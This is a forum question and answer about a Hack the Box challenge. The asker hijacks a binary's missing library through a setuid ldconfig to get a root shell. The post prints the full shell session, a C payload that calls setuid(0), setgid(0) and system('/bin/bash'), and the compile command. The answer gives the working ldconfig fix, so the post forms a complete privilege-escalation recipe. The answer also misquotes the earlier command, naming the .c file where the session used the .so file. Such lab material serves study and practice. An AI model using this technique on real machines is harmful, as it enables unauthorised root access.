Manually linking C library for executable

Question

I am currently working on a challenge on Hack the Box and am trying to get an existing executable on an exercise machine to run by library in place of one that is missing from the 'vulnerable' script.

The missing library is libseclogin.so. I have created a new file in /dev/shm and from there I have tried to use ldconfig to manually link the new library to drop me into a shell when myexec is run. ldconfig has the sticky bit set.

Here are the commands I have run. At the very end you can see that when I run ldd again to check the library has been relinked to /dev/shm/libseclogin.so that there has been no change.

Am I missing something out from this process?

genevieve@dab:/dev/shm$ ldd /usr/bin/myexec 
    linux-vdso.so.1 =>  (0x00007ffdbc6d9000)
    libseclogin.so => /usr/lib/libseclogin.so (0x00007f5d75cb4000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f5d758ea000)
    /lib64/ld-linux-x86-64.so.2 (0x00007f5d75eb6000)
genevieve@dab:/dev/shm$ ls -la /sbin/ldconfig
-rwsr-sr-x 1 root root 387 Jan 14  2018 /sbin/ldconfig
genevieve@dab:/dev/shm$ nano libseclogin.c
genevieve@dab:/dev/shm$ gcc -Wall -fPIC -shared -o libseclogin.so libseclogin.c -ldl
libseclogin.c: In function ‘main’:
libseclogin.c:4:2: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
  setuid(0);
  ^
libseclogin.c:5:2: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
  setgid(0);
  ^
libseclogin.c:6:2: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
  system("/bin/bash");
  ^
genevieve@dab:/dev/shm$ chmod +x libseclogin.so 
genevieve@dab:/dev/shm$ ldconfig -l /dev/shm/libseclogin.so 
genevieve@dab:/dev/shm$ LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/dev/shm
genevieve@dab:/dev/shm$ echo $LD_LIBRARY_PATH 
:/dev/shm
genevieve@dab:/dev/shm$ ldd /usr/bin/myexec 
    linux-vdso.so.1 =>  (0x00007ffc5f7f0000)
    libseclogin.so => /usr/lib/libseclogin.so (0x00007eff487fa000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007eff48430000)
    /lib64/ld-linux-x86-64.so.2 (0x00007eff489fc000)
genevieve@dab:/dev/shm$ 

This is the basic C scipt I am using to drop into the shell.

#include <stdio.h>

int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
}

Compile command to create shared library.

gcc -Wall -fPIC -shared -o libseclogin.so libseclogin.c -ldl

Answer 1

Issue was primarily down to my usage of ldconfig.

Once I ran it without explicitly specifying the so file, this seemed to correct the issues.

Correct command...

ldconfig /dev/shm

Rather than...

ldconfig /dev/shm/libseclogin.c

Then when I ran ldd myexec I got the correct output.

genevieve@dab:/dev/shm$ ldd /usr/bin/myexec 
    linux-vdso.so.1 =>  (0x00007ffdbc6d9000)
    libseclogin.so => /dev/shm/libseclogin.so (0x00007f5d75cb4000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f5d758ea000)
    /lib64/ld-linux-x86-64.so.2 (0x00007f5d75eb6000)